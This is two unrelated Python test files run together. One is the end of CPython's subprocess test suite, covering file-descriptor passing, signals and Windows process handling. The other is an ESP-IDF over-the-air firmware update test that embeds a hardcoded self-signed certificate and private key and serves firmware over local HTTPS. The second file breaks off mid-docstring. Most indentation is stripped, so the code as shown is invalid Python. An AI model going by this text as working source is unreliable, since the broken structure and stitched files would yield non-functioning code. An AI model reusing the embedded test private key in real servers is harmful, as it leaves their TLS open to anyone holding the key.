# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
        # Leave two pairs of low fds available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
del p
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
        # allow some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
executable_list = "exec" # error: must be a sequence
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
        # We use hardcoded constants because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertIn(b"physalis", p.stdout.read())
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
        # Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class CommandTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = set(("list2cmdline",))
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
self.addCleanup(p.stdout.close)
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(FileNotFoundError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
def test_main():
unit_tests = (ProcessTestCase,
POSIXProcessTestCase,
Win32ProcessTestCase,
CommandTests,
ProcessTestCaseNoPoll,
CommandsWithSpaces,
ContextManagerTests,
)
support.run_unittest(*unit_tests)
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
example_test.py
|
import http.server
import os
import random
import re
import socket
import ssl
import struct
import subprocess
from threading import Thread
import ttfw_idf
from tiny_test_fw import DUT
server_cert = '-----BEGIN CERTIFICATE-----\n' \
'MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n'\
'BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n'\
'aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n'\
'MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n'\
'ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n'\
'CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n'\
'nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n'\
'9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n'\
'w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n'\
'3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n'\
'lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n'\
'IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n'\
'DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n'\
'/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n'\
'lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n'\
'6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n'\
'fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n'\
'y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n'\
'hA==\n'\
'-----END CERTIFICATE-----\n'
server_key = '-----BEGIN PRIVATE KEY-----\n'\
'MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n'\
'uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n'\
'iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n'\
'ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n'\
'BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n'\
'1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n'\
'Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n'\
'02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n'\
'4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n'\
'SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n'\
'cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n'\
'8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n'\
'MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n'\
'6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n'\
'CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n'\
'ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n'\
'0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n'\
'5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n'\
'zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n'\
'V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n'\
'RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n'\
'nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n'\
'GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n'\
'9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n'\
'qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n'\
'muhfskWf4MABV0yTUaKcGg==\n'\
'-----END PRIVATE KEY-----\n'
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def get_server_status(host_ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_status = sock.connect_ex((host_ip, port))
sock.close()
if server_status == 0:
return True
return False
def create_file(server_file, file_data):
with open(server_file, 'w+') as file:
file.write(file_data)
def get_ca_cert(ota_image_dir):
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, 'server_cert.pem')
create_file(server_file, server_cert)
key_file = os.path.join(ota_image_dir, 'server_key.pem')
create_file(key_file, server_key)
return server_file, key_file
def https_request_handler():
"""
    Returns a request handler class that handles broken pipe exceptions
"""
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def finish(self):
try:
if not self.wfile.closed:
self.wfile.flush()
self.wfile.close()
except socket.error:
pass
self.rfile.close()
def handle(self):
try:
http.server.BaseHTTPRequestHandler.handle(self)
except socket.error:
pass
return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
requestHandler = https_request_handler()
httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
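# Note: ssl.wrap_socket() is deprecated in newer Python releases. An
# SSLContext-based variant of the wrapping above would look roughly like the
# following sketch (same server_file/key_file as produced by get_ca_cert):
#
#     context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
#     context.load_cert_chain(certfile=server_file, keyfile=key_file)
#     httpd.socket = context.wrap_socket(httpd.socket, server_side=True)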
def start_chunked_server(ota_image_dir, server_port):
server_file, key_file = get_ca_cert(ota_image_dir)
chunked_server = subprocess.Popen(['openssl', 's_server', '-WWW', '-key', key_file, '-cert', server_file, '-port', str(server_port)])
return chunked_server
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example(env, extra_data):
"""
    This is a positive test case, which downloads the complete binary file multiple times.
    The number of iterations can be specified in the variable iterations.
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
    # Number of times the application's operation is validated
iterations = 3
# File to be downloaded. This file is generated after compilation
bin_name = 'native_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
for i in range(iterations):
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting OTA example', timeout=30)
dut1.reset()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
"""
    This test case validates OTA behavior when the binary file is truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate truncated binary file
3. Fetch OTA image over HTTPS
4. Check working of code if bin is truncated
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated.bin'
    # Size of the truncated file to be generated. This value can range from 288 bytes (image header size) to the size of the original binary file
    # truncated_bin_size is set to 64000 to reduce the time consumed by the test case
truncated_bin_size = 64000
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: Image validation failed, image is corrupted', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_truncated_header(env, extra_data):
"""
    This test case validates OTA behavior when the headers of the binary file are truncated.
    The application should return an error message in this case.
steps: |
1. join AP
2. Generate binary file with truncated headers
3. Fetch OTA image over HTTPS
4. Check working of code if headers are not sent completely
"""
dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
server_port = 8002
# Original binary file generated after compilation
bin_name = 'native_ota.bin'
# Truncated binary file to be generated from original binary file
truncated_bin_name = 'truncated_header.bin'
    # Size of the truncated file to be generated. This value should be less than 288 bytes (image header size)
truncated_bin_size = 180
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
fo.write(f.read(truncated_bin_size))
fo.close()
f.close()
binary_file = os.path.join(dut1.app.binary_path, truncated_bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=60)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + truncated_bin_name)
dut1.expect('native_ota_example: received package is not fit len', timeout=20)
os.remove(binary_file)
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA')
def test_examples_protocol_native_ota_example_random(env, extra_data):
"""
    This test case validates OTA behavior when the binary file contains random data.
